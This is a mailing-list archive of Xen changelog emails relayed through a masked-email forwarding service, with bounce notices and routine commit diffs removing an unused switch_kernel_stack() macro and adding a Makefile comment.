X-GetAbine-Host-Address: 23.23.126.237
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFlrPLMWRWlGSWpSXmKPExsWS0XRdVdfUyyz
 S4O4uQYsJ2wwcGD229+1iD2CMYs3MS8qvSGDNOLvyFkvBHs6KXdNPMjYw/mTvYuTkEBL4wigx
 8ZJsFyMXkH2eUWLHo9/MXYwcHGwCYhJz9yqA1IgIqErMWrGcGaJeXaLpdwMbSImwgL3EiXceI
 GFeATOJQzObwEpYgMrXnV7NMoGRYwEjwypGjeLUorLUIl1jQ72kosz0jJLcxMwcXUMDM73c1O
 LixPTUnMSkYr3k/NxNjECPMADBDsamRYGHGCU5mJREecWtzSKF+JLyUyozEosz4otKc1KLDzH
 KcHAoSfBaeALlBItS01Mr0jJzgKEBk5bg4FES4a1xBUrzFhck5hZnpkOkTjEqSonz8oP0CYAk
 Mkrz4Npg4XiJUVZKmJcR6BAhnoLUotzMElT5V4ziHIxKwrxOIFN4MvNK4Ka/AlrMBLSY75IJy
 OKSRISUVAPjmYuhR8+LxLzcONHhZvmqlqY/nSp7GSccb4q4pXBkrmBY3Np4mc/m5g9TdqteX+
 5/0tbKasedh35SM1N+MpwPfPz+yzTH48yfKxIfN8d4JlZ8/+vOd+j0Znv2z67bBRPZvZ3fT1g
 ncjZzzqv6daJMH3vYxev23KuW97hnoiwQdnLplBPqbHNblViKMxINtZiLihMBBnP5bUICAAA=
=3D
X-Env-Sender: ian.jackson@eu.citrix.com
X-Msg-Ref: server-5.tower-27.messagelabs.com!1496730164!100734195!1
X-Originating-IP: [104.130.215.37]
X-SpamReason: No, hits=3D0.0 required=3D7.0 tests=3D
X-StarScan-Received:=20
X-StarScan-Version: 9.4.19; banners=3D-,-,-
X-VirusChecked: Checked
Message-Id: <E1dI7t5-0004Jk-B8@xenbits.xenproject.org>
Date: Tue, 06 Jun 2017 06:22:43 +0000
Subject: [Xen-changelog] [xen master] x86/pv: Drop unused
	switch_kernel_stack()
X-BeenThere: xen-changelog@lists.xen.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: "Change log for Mercurial \(receive only\)"
 <xen-changelog.lists.xen.org>
List-Unsubscribe: <https://lists.xen.org/cgi-bin/mailman/options/xen-change=
log>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dunsubscribe>
List-Unsubscribe: <mailto:unsubscribe-1188110264-f4da1594@opayq.com>, <http=
s://emails.abine.com/disableDisposable?fwd=3DFWD-737QHYSMHVAYQAUCAOIQBDAAGA=
QLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=
=3D@opayq.com>
List-Post: <mailto:xen-changelog@lists.xen.org>
List-Help: <mailto:xen-changelog-request@lists.xen.org?subject=3Dhelp>
List-Subscribe: <https://lists.xen.org/cgi-bin/mailman/listinfo/xen-changel=
og>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dsubscribe>
X-Sender-Domain: xenproject.org
X-Spamfilter-host: plato.junkemailfilter.com - http://www.junkemailfilter.c=
om
X-Key-ID: ZjRkYTE1OTRAb3BheXEuY29tIHhlbi1jaGFuZ2Vsb2ctYm91bmNlc0BsaXN0cy54Z=
W4ub3JnIDIwMTctMDYtMDUgMjM6MjI6NDggMWRJN3RBLTAwMDJ2Qy1Jdw=3D=3D
X-Mail-from: xen-changelog-bounces@lists.xen.org
X-Sender-Host-Address: 192.237.175.120
X-Sender-Host-Name: lists.xenproject.org
X-Key-ID: Y3VydGlza3dvbmc5QGdtYWlsLmNvbSBmd2QtNzM3cWh5c21odmF5cWF1Y2FvaXFiZ=
GFhZ2FxbG1hMnlhbWhlY2NqZGxpYmF5YXd5YWtpYXphcWhzbWNjd21ibGlhNHVhbnF1ZWlnY2lt=
YmttYXp1ejRhYWVhYWNhPT09QG9wYXlxLmNvbSAyMDE3LTA2LTA1IDIzOjIyOjUxIDFkSTd0RC0=
wMDAwb28tQWI=3D


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
CA=3D=3D=3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
/?pk_campaign=3DmaskHeader#premium
-------------------------by Abine-------------------------


commit 353490a6f0d69bf4630b758742d4f4e070e52e81
Author:     Andrew Cooper <andrew.cooper3@citrix.com>
AuthorDate: Thu May 4 15:19:31 2017 +0100
Commit:     Andrew Cooper <andrew.cooper3@citrix.com>
CommitDate: Tue May 30 18:50:13 2017 +0100

    x86/pv: Drop unused switch_kernel_stack()
   =20
    Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
    Reviewed-by: Wei Liu <wei.liu2@citrix.com>
    Acked-by: Jan Beulich <jbeulich@suse.com>
---
 xen/arch/x86/domain.c | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/xen/arch/x86/domain.c b/xen/arch/x86/domain.c
index 13cdc50..d9f3cfa 100644
--- a/xen/arch/x86/domain.c
+++ b/xen/arch/x86/domain.c
@@ -1885,8 +1885,6 @@ static void save_segments(struct vcpu *v)
     this_cpu(dirty_segment_mask) =3D dirty_segment_mask;
 }
=20
-#define switch_kernel_stack(v) ((void)0)
-
 static void paravirt_ctxt_switch_from(struct vcpu *v)
 {
     save_segments(v);
@@ -1905,8 +1903,6 @@ static void paravirt_ctxt_switch_to(struct vcpu *v)
 {
     unsigned long cr4;
=20
-    switch_kernel_stack(v);
-
     cr4 =3D pv_guest_cr4_to_real_cr4(v);
     if ( unlikely(cr4 !=3D read_cr4()) )
         write_cr4(cr4);
--
generated by git-patchbot for /home/xen/git/xen.git#master

_______________________________________________
Xen-changelog mailing list
Xen-changelog@lists.xen.org
https://lists.xenproject.org/xen-changelog

[-- Attachment #2: Type: text/plain, Size: 127 bytes --]

_______________________________________________
Xen-devel mailing list
Xen-devel@lists.xen.org
https://lists.xen.org/xen-devel

^ permalink raw reply related	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2017-06-09  8:25 f4da1594
  0 siblings, 0 replies; 183+ messages in thread
From: f4da1594 @ 2017-06-09  8:25 UTC (permalink / raw)
  To: xen-devel


[-- Attachment #1.1.1.1: Type: text/plain, Size: 137 bytes --]


** Message not delivered **

There was a problem delivering your message to curtiskwong9@gmail.com. See the technical details below.




[-- Attachment #1.1.1.2: Type: text/html, Size: 1177 bytes --]

[-- Attachment #1.1.2: icon.png --]
[-- Type: image/png, Size: 5747 bytes --]

[-- Attachment #1.2: Type: message/delivery-status, Size: 423 bytes --]

[-- Attachment #1.3: Type: message/global, Size: 10302 bytes --]


E4R
         OCVXoMqvT0/3B4awv4mN9LQQl6TMal6jycXiFWOi0X69xc8WWnUu53yAy3IGRo5tSe=
fo
         S8oomu11zMeI04ziQCxGzT4ujbSYoTqnpSqjfJwddgjeU7M78sJ/HBiBFoS4eFffAH=
jH
         VBDaL9RicEROZF++jaRkF4PKpRR1X9uCzcgh3Dkyjwtfe72kwhTCr2XsRD6kYp4HTa=
sO
         Cgjqp/tBbA4MtpxAuv4syAc1WuwyeuGVsJpKasTIVD3F4cc+PSTehc7lWl85Nbq1bL=
YV
         3VLw=3D=3D
ARC-Message-Signature: i=3D1; a=3Drsa-sha256; c=3Drelaxed/relaxed; d=3Dgoog=
le.com; s=3Darc-20160816;
        h=3Dlist-subscribe:list-help:list-post:list-unsubscribe
         :list-unsubscribe:list-id:precedence:subject:date:message-id:to
         :reply-to:sender:from:mime-version:dkim-signature:delivery-date
         :arc-authentication-results;
        bh=3DJeRw2dr4RWNieXNP6z59H08xiY6pVbQ/kbKN4+vob+4=3D;
        b=3DLbBwrA9OLmedH7jkLY1blB3YmZ2iFuZ9YI3W1C3jZqX0LND/oy/HBqQ9HFQU9JJ=
ncE
         PRY95FKW5jVENcNaPc2yXLOH8w2yNOqmNDRHna7FHqm8U6eI7j1BByfb0kwWZGO7IR=
JS
         cX0SCPT78VQIalUXQzq31G8x00ZPGh6infhNAe1oGXs+fjUxpcBwRvm2677CmE/EYJ=
CP
         p4PyDFXkg5EJYglqbpl+JoOOEwl5bDF/b2V08ivg47faYEhgsehQcoNKC9qrgxxVpE=
4k
         yY4OVFdMXPSOElFnyP3ETanHhaIORk2WrhuvvZjvvZed+W5/wCCZHmGmAwBlXYbvyJ=
aD
         HVrw=3D=3D
ARC-Authentication-Results: i=3D1; mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.164 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Return-Path: <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHS=
MCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Received: from smtp164.junkemailfilter.com (smtp164.junkemailfilter.com. [6=
9.50.231.164])
        by mx.google.com with ESMTPS id u22si9349830plk.91.2017.06.05.23.23=
.24
        for <curtiskwong9@gmail.com>
        (version=3DTLS1_2 cipher=3DECDHE-RSA-AES128-GCM-SHA256 bits=3D128/1=
28);
        Mon, 05 Jun 2017 23:23:25 -0700 (PDT)
Received-SPF: pass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlm=
a2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@o=
payq.com designates 69.50.231.164 as permitted sender) client-ip=3D69.50.23=
1.164;
Authentication-Results: mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.164 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Delivery-date: Mon, 05 Jun 2017 23:23:25 -0700
Received: from opayq-out-07.junkemailfilter.com ([184.105.182.157]:54618) h=
elo=3Dopayq-out-07.junkemailfilter.com
	by outscan-backup.junkemailfilter.com with esmtps (TLSv1.2:ECDHE-RSA-AES25=
6-GCM-SHA384:256)
	(Exim 4.89)
	id 1dI7tk-0003bQ-IA on interface=3D69.50.231.152
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:23:24 -0700
Received: from smtp3.opayq.com ([23.23.126.237]:7488) helo=3D[23.23.126.237=
]
	by opayq-outbound.junkemailfilter.com with esmtps (TLSv1.2:AES256-SHA256:2=
56)
	(Exim 4.89)
	id 1dI7su-0000Zp-It on interface=3D184.105.182.150
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:22:32 -0700
DKIM-Signature: v=3D1; d=3Dopayq.com; t=3D1496730150; b=3Deb+zso5EMcXbX/5Hf=
5XEUMxeIw3gvGr2LGAl1ULwlKEY4EaDB8fxcLfNWvMu11p9an2pCrZtYDdMwB+luIzanb9YyBrz=
+2kOjuYWlN5NQ9i+XWRQzCBGmgCo2cAiXDDaYyqlCiyDbhC+quJ200zSIDp48Ccq5QDq8YOqmjk=
WX7w=3D; s=3Dabine; c=3Drelaxed/relaxed; a=3Drsa-sha256; bh=3DJeRw2dr4RWNie=
XNP6z59H08xiY6pVbQ/kbKN4+vob+4=3D; h=3DDate:From:Reply-To:Subject:To:List-U=
nsubscribe;
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=3D"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D0983334271543742890=3D=3D"
X-GetAbine-Processed: 1
From: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJ=
DLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Sender: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHEC=
CJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com=
>
Reply-To:=20
	FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UAN=
QUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com
To: f4da1594@opayq.com
X-GetAbine-Sender: xen-changelog-bounces@lists.xen.org
X-GetAbine-Disposable: f4da1594@opayq.com
X-GetAbine-Host-Address: 23.23.126.237
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFtrALMWRWlGSWpSXmKPExsWS0XRdVVfByyz
 SoG+1uMWEbQYOjB7b+3axBzBGsWbmJeVXJLBmLDg+ibXgI0fFnx8bWRsY17J3MXJyCAl8YZT4
 sSehi5ELyD7PKDGl6wBQgoODTUBMYu5eBZAaEQFViVkrljND1KtLNP1uYAOxhQU8JR623QGbw
 ytgJvHmwCEWEJsFqL5j7kvmCYwcCxgZVjFqFKcWlaUW6RoZ6iUVZaZnlOQmZuboGhqY6uWmFh
 cnpqfmJCYV6yXn525iBPqknoGBcQfj3cl+hxglOZiURHnFrc0ihfiS8lMqMxKLM+KLSnNSiw8
 xynBwKEnw7vUAygkWpaanVqRl5gCDAyYtwcGjJMJb4wqU5i0uSMwtzkyHSJ1iVJQS5833BEoI
 gCQySvPg2mABeYlRVkqYl5GBgUGIpyC1KDezBFX+FaM4B6OSMK8TyBSezLwSuOmvgBYzAS3mu
 2QCsrgkESEl1cB4NXq+ZW3zlI977Dg+zBD79EGnetqshQvNs3Z/Wjfl+uRpqhsmzjTXzej78u
 1aparIJodjS1m4W25/yghi1RLj2HXIZdfqHYFXlmewPQj0lrjx+4xlceVOPsljWgrqf+Xjbgk
 /NE42Ey5Iq3f6KPbFQPXjF72jG3Wa1ERFPho2u+4L3/qgLVlbiaU4I9FQi7moOBEAKpwkokMC
 AAA=3D
X-Env-Sender: ian.jackson@eu.citrix.com
X-Msg-Ref: server-3.tower-206.messagelabs.com!1496730143!98403413!1
X-Originating-IP: [104.130.215.37]
X-SpamReason: No, hits=3D0.0 required=3D7.0 tests=3D
X-StarScan-Received:=20
X-StarScan-Version: 9.4.19; banners=3D-,-,-
X-VirusChecked: Checked
Message-Id: <E1dI7sl-0004IJ-5G@xenbits.xenproject.org>
Date: Tue, 06 Jun 2017 06:22:23 +0000
Subject: [Xen-changelog] [xen master] Makefile: Mention usual targets of
	subdir Makefiles
X-BeenThere: xen-changelog@lists.xen.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: "Change log for Mercurial \(receive only\)"
 <xen-changelog.lists.xen.org>
List-Unsubscribe: <https://lists.xen.org/cgi-bin/mailman/options/xen-change=
log>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dunsubscribe>
List-Unsubscribe: <mailto:unsubscribe-1188110264-f4da1594@opayq.com>, <http=
s://emails.abine.com/disableDisposable?fwd=3DFWD-737QHYSMHVAYQAUCAOIQBDAAGA=
QLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=
=3D@opayq.com>
List-Post: <mailto:xen-changelog@lists.xen.org>
List-Help: <mailto:xen-changelog-request@lists.xen.org?subject=3Dhelp>
List-Subscribe: <https://lists.xen.org/cgi-bin/mailman/listinfo/xen-changel=
og>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dsubscribe>
X-Sender-Domain: xenproject.org
X-Spamfilter-host: plato.junkemailfilter.com - http://www.junkemailfilter.c=
om
X-Key-ID: ZjRkYTE1OTRAb3BheXEuY29tIHhlbi1jaGFuZ2Vsb2ctYm91bmNlc0BsaXN0cy54Z=
W4ub3JnIDIwMTctMDYtMDUgMjM6MjI6MjggMWRJN3NxLTAwMDBHcy1FSA=3D=3D
X-Mail-from: xen-changelog-bounces@lists.xen.org
X-Sender-Host-Address: 192.237.175.120
X-Sender-Host-Name: lists.xenproject.org
X-Key-ID: Y3VydGlza3dvbmc5QGdtYWlsLmNvbSBmd2QtNzM3cWh5c21odmF5cWF1Y2FvaXFiZ=
GFhZ2FxbG1hMnlhbWhlY2NqZGxpYmF5YXd5YWtpYXphcWhzbWNjd21ibGlhNHVhbnF1ZWlnY2lt=
YmttYXp1ejRhYWVhYWNhPT09QG9wYXlxLmNvbSAyMDE3LTA2LTA1IDIzOjIyOjMyIDFkSTdzdS0=
wMDAwWnAtSXQ=3D

--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D0983334271543742890=3D=3D
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
=3D
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
=3D
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
=3D
CA=3D3D=3D3D=3D3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
=3D
/?pk_campaign=3D3DmaskHeader#premium
-------------------------by Abine-------------------------


commit 624dc330171a27f21b9664da7fc8b06bcc29be48
Author:     Ian Jackson <ian.jackson@eu.citrix.com>
AuthorDate: Thu May 25 16:42:12 2017 +0100
Commit:     Ian Jackson <Ian.Jackson@eu.citrix.com>
CommitDate: Tue May 30 18:38:54 2017 +0100

    Makefile: Mention usual targets of subdir Makefiles
   =3D20
    Suggested-by: Roger Pau Monn=3DC3=3DA9 <roger.pau@citrix.com>
    Signed-off-by: Ian Jackson <Ian.Jackson@eu.citrix.com>
    Acked-by: Roger Pau Monn=3DC3=3DA9 <roger.pau@citrix.com>
    CC: Wei Liu <wei.liu2@citrix.com>
    CC: M A Young <m.a.young@durham.ac.uk>
    CC: Andrew Cooper <andrew.cooper3@citrix.com>
---
 Makefile | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/Makefile b/Makefile
index 51905eb..2ff33df 100644
--- a/Makefile
+++ b/Makefile
@@ -90,6 +90,11 @@ test:
 #
 # Also, we have a number of targets COMPONENT which run
 # dist-COMPONENT, for convenience.
+#
+# The Makefiles invoked with -C from the toplevel should
+# generally have the following targets:
+#       all  build  install  clean  distclean
+
=3D20
 .PHONY: dist
 dist: DESTDIR=3D3D$(DISTDIR)/install
--
generated by git-patchbot for /home/xen/git/xen.git#master


--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D0983334271543742890=3D=3D
Content-Type: text/plain; charset=3D"utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
CA=3D=3D=3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
/?pk_campaign=3DmaskHeader#premium
-------------------------by Abine-------------------------


_______________________________________________
Xen-changelog mailing list
Xen-changelog@lists.xen.org
https://lists.xenproject.org/xen-changelog
--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D0983334271543742890=3D=3D--

[-- Attachment #2: Type: text/plain, Size: 127 bytes --]

_______________________________________________
Xen-devel mailing list
Xen-devel@lists.xen.org
https://lists.xen.org/xen-devel

^ permalink raw reply related	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2017-06-09  8:16 f4da1594
  0 siblings, 0 replies; 183+ messages in thread
From: f4da1594 @ 2017-06-09  8:16 UTC (permalink / raw)
  To: xen-devel


[-- Attachment #1.1.1.1: Type: text/plain, Size: 137 bytes --]


** Message not delivered **

There was a problem delivering your message to curtiskwong9@gmail.com. See the technical details below.




[-- Attachment #1.1.1.2: Type: text/html, Size: 1177 bytes --]

[-- Attachment #1.1.2: icon.png --]
[-- Type: image/png, Size: 5747 bytes --]

[-- Attachment #1.2: Type: message/delivery-status, Size: 423 bytes --]

[-- Attachment #1.3: Type: message/global, Size: 10266 bytes --]


;
        Mon, 05 Jun 2017 23:32:13 -0700 (PDT)
ARC-Seal: i=3D1; a=3Drsa-sha256; t=3D1496730733; cv=3Dnone;
        d=3Dgoogle.com; s=3Darc-20160816;
        b=3D0OFnE140OavXy4RpcyZp8d/kosZyGNe3/CkrYZTjdENtG6F6QqkA8xebbWGyaaw=
mBT
         ac4lz3O/Ab+bg9INotbm0BScUYBhz7ORrinT/Q58siP47LeGIKid7ys8aFgUhf9nGl=
c8
         iefpUd+JpfnB+c+n0Ki1xoy4MMEbxPDN4hSrg1OU6fRDdSZQ5eFxQ3L0kLPoz8B7DL=
8y
         3kD5AFTpU9Yw4bsF0J0jwAqsrgTGeVIXI7l2VCKIUtSmzHw2EhfHRPO0efRJgPssXl=
o9
         /eKF29uhlnYLJSSTz2gBMEAdJakxjbm53fgmyRD3mIxDQvzcZOSwr3MyCybqBumH30=
Fd
         lnlw=3D=3D
ARC-Message-Signature: i=3D1; a=3Drsa-sha256; c=3Drelaxed/relaxed; d=3Dgoog=
le.com; s=3Darc-20160816;
        h=3Dlist-subscribe:list-help:list-post:list-unsubscribe
         :list-unsubscribe:list-id:precedence:subject:date:message-id:to
         :reply-to:sender:from:mime-version:dkim-signature:delivery-date
         :arc-authentication-results;
        bh=3DX2wQ+IVcKouZSQm0kKMg6N9Z4IuHBOfv1MbZ3CpOuMo=3D;
        b=3Dlewse5xuDLL6zSF4UzlPl3woF2HjZ1PVQ6KrHY9cySAO+Agq//SOl0FvEmobUOk=
he9
         f7qQzZAwSbmWdIu6A3XFe08vdTCgYtQg6BazqhMHwpTEfAM4XaCGB7Ya1rScnS+uHi=
Od
         pUnJEG+HdgeIht4Tg+5pidl6bPV5qPgfjefNHhBuf7h8EH5Nfm1tNvM1T6AdDpxQ41=
D9
         n+BCj9k6IMMpQrdnv2iiLl3dkNcviOM1jPGycEh6vfJfAHb9iNOVk3aLiUN5FTConL=
Pi
         9LllHrOZSRflgOJeld/C+dnLWai+XB1cq00Xbek9nEaDIQmj8HoK8PDxyeg6vpRFQM=
GW
         E9cQ=3D=3D
ARC-Authentication-Results: i=3D1; mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.162 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Return-Path: <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHS=
MCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Received: from smtp162.junkemailfilter.com (smtp162.junkemailfilter.com. [6=
9.50.231.162])
        by mx.google.com with ESMTPS id h123si31869392pgc.251.2017.06.05.23=
.32.13
        for <curtiskwong9@gmail.com>
        (version=3DTLS1_2 cipher=3DECDHE-RSA-AES128-GCM-SHA256 bits=3D128/1=
28);
        Mon, 05 Jun 2017 23:32:13 -0700 (PDT)
Received-SPF: pass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlm=
a2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@o=
payq.com designates 69.50.231.162 as permitted sender) client-ip=3D69.50.23=
1.162;
Authentication-Results: mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.162 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Delivery-date: Mon, 05 Jun 2017 23:32:13 -0700
Received: from opayq-out-07.junkemailfilter.com ([184.105.182.157]:54290) h=
elo=3Dopayq-out-07.junkemailfilter.com
	by outscan-backup.junkemailfilter.com with esmtps (TLSv1.2:ECDHE-RSA-AES25=
6-GCM-SHA384:256)
	(Exim 4.89)
	id 1dI82G-0005cx-UX on interface=3D69.50.231.152
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:32:12 -0700
Received: from smtp3.opayq.com ([23.23.126.237]:7792) helo=3D[23.23.126.237=
]
	by opayq-outbound.junkemailfilter.com with esmtps (TLSv1.2:AES256-SHA256:2=
56)
	(Exim 4.89)
	id 1dI7ue-0001y9-Mb on interface=3D184.105.182.150
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:24:20 -0700
DKIM-Signature: v=3D1; d=3Dopayq.com; t=3D1496730259; b=3Dji9Mq0PdP65uu1QDf=
b1mvGkX3VUKljJiCRGyqPwu1IviVS8eDKL/55FNcFiKE74Ls+xq/vepE4+TK893CPmlW/klzcq8=
JalrIvEMLvDz9EEJErIdj330b/lGiVwLr7wlLGa0AShrs2lK/NsvuuH8zg65mXKy/oZLk6W20Sv=
Yd8I=3D; s=3Dabine; c=3Drelaxed/relaxed; a=3Drsa-sha256; bh=3DX2wQ+IVcKouZS=
Qm0kKMg6N9Z4IuHBOfv1MbZ3CpOuMo=3D; h=3DDate:From:Reply-To:Subject:To:List-U=
nsubscribe;
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=3D"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D1214394456227948508=3D=3D"
X-GetAbine-Processed: 1
From: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJ=
DLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Sender: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHEC=
CJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com=
>
Reply-To:=20
	FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UAN=
QUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com
To: f4da1594@opayq.com
X-GetAbine-Sender: xen-changelog-bounces@lists.xen.org
X-GetAbine-Disposable: f4da1594@opayq.com
X-GetAbine-Host-Address: 23.23.126.237
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFtrALMWRWlGSWpSXmKPExsWS0XRdVbffyyz
 S4GY7l8WEbQYOjB7b+3axBzBGsWbmJeVXJLBmLHhnVnCao2J1wxymBsYG9i5GLg4hgS+MEjfu
 /YByzjNKLDnUCORwcLAJiEnM3avQxcjJISKgKjFrxXJmEFtIQF2i6XcDG4gtLOAjsXXDATCbV
 8BM4sSTCWA1LED1u+YfYJ/AyLGAkWEVo0ZxalFZapGuobFeUlFmekZJbmJmjq6hgbFebmpxcW
 J6ak5iUrFecn7uJkagTxiAYAfjtu2ehxglOZiURHnFrc0ihfiS8lMqMxKLM+KLSnNSiw8xynB
 wKEnwWngC5QSLUtNTK9Iyc4DBAZOW4OBREuGtcQVK8xYXJOYWZ6ZDpE4xKkqJ8/KD9AmAJDJK
 8+DaYAF5iVFWSpiXEegQIZ6C1KLczBJU+VeM4hyMSsK8TiBTeDLzSuCmvwJazAS0mO+SCcjik
